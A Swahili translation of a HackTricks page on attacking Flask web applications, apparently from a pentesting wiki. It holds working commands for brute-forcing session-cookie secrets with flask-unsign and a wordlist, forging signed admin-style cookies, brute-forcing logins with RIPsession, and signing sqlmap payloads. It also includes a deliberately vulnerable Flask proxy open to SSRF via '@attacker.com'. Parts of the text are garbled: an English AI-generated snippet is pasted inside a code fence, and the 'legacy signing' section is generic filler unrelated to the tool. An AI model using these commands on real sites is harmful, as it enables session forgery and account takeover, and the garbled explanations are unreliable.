hacktricks/network-services-pentesting/pentesting-web/flask.md

# Flask

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

<figure><img src="../../.gitbook/assets/image (9) (1) (2).png" alt=""><figcaption></figcaption></figure>

Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kuautomatisha mchakato** wa kazi zinazotumia zana za jamii za **kisasa zaidi**.\
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

**Labda ikiwa unacheza CTF, programu ya Flask itahusiana na** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**

## Vidakuzi (Cookies)

Jina la kikao cha kidakuzi cha chaguo-msingi ni **`session`**.

### Mchawi wa Dekoda

Dekoda ya kidakuzi ya Flask mtandaoni: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)

#### Kwa Mkono

Pata sehemu ya kwanza ya kidakuzi hadi alama ya kwanza na ukadiri Base64>
```bash
echo "ImhlbGxvIg" | base64 -d
```
Kuki pia inasainiwa kwa kutumia nenosiri

### **Flask-Unsign**

Zana ya mstari wa amri ya kupata, kubadilisha, kuvunja nguvu na kutengeneza kuki za kikao za programu ya Flask kwa kudhani funguo za siri.

{% embed url="https://pypi.org/project/flask-unsign/" %}
```bash
pip3 install flask-unsign
```
#### **Tafsiri Cookie**

```html
To decode a Flask session cookie, you can use the `itsdangerous` library in Python. The session cookie is usually a base64-encoded string that contains information about the user's session.

Here is an example of how to decode a Flask session cookie:

```python
from itsdangerous import URLSafeTimedSerializer

def decode_cookie(cookie_value, secret_key):
    serializer = URLSafeTimedSerializer(secret_key)
    try:
        decoded_data = serializer.loads(cookie_value)
        return decoded_data
    except Exception as e:
        return str(e)
```

In the above code, the `decode_cookie` function takes two parameters: `cookie_value` and `secret_key`. The `cookie_value` parameter is the value of the session cookie that you want to decode, and the `secret_key` parameter is the secret key used to sign the cookie.

The `URLSafeTimedSerializer` class from the `itsdangerous` library is used to create a serializer object. The `loads` method of the serializer object is then used to decode the cookie value.

If the decoding is successful, the decoded data is returned. Otherwise, an exception is raised and the error message is returned as a string.

Remember that decoding a session cookie can be useful for analyzing the information stored in it, but it should not be used to modify or tamper with the session data.
```bash
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
```
#### **Kuvunja Kwa Nguvu**
```bash
flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval
```
#### **Kusaini**
```bash
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
```
#### Kusaini kwa kutumia toleo la zamani (legacy)

Kusaini kwa kutumia toleo la zamani (legacy) ni njia ya kusaini data kwa kutumia toleo la zamani la itifaki au algorithm. Hii inaweza kuwa hatari kwa sababu toleo la zamani linaweza kuwa na udhaifu au mapungufu ambayo yanaweza kusababisha kuvuja kwa data au kushambuliwa na wadukuzi.

Kabla ya kusaini kwa kutumia toleo la zamani, ni muhimu kuelewa hatari zinazohusika na kufanya tathmini ya usalama. Ni bora kutumia toleo la sasa la itifaki au algorithm ili kuhakikisha usalama wa data yako.

Ikiwa unahitaji kusaini kwa kutumia toleo la zamani kwa sababu fulani, hakikisha kuwa unazingatia miongozo ya usalama na kuchukua hatua za ziada za kulinda data yako. Pia, fanya kazi na wataalamu wa usalama ili kuhakikisha kuwa mchakato wako wa kusaini unafanywa kwa usalama na kwa njia sahihi.
```bash
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
```
### **RIPsession**

Chombo cha amri kinachotumika kuvunja nguvu tovuti kwa kutumia vidakuzi vilivyoundwa na flask-unsign.

{% embed url="https://github.com/Tagvi/ripsession" %}
```bash
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
```
### SQLi katika kuki ya kikao cha Flask na SQLmap

[**Mfano huu**](../../pentesting-web/sql-injection/sqlmap/#eval) hutumia chaguo la sqlmap `eval` kwa **kiotomatiki kusaini malipo ya sqlmap** kwa kutumia siri inayojulikana.

## Flask Proxy kwa SSRF

[**Katika nakala hii**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) imeelezewa jinsi Flask inavyoruhusu ombi linaloanza na herufi "@":
```http
GET @/ HTTP/1.1
Host: target.com
Connection: close
```
Katika mazingira yafuatayo:
```python
from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)
```
Inaruhusu kuweka kitu kama "@attacker.com" ili kusababisha **SSRF**.



<figure><img src="../../.gitbook/assets/image (9) (1) (2).png" alt=""><figcaption></figcaption></figure>

Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kuautomatisha mchakato** zinazotumia zana za jamii za **juu zaidi** duniani.\
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>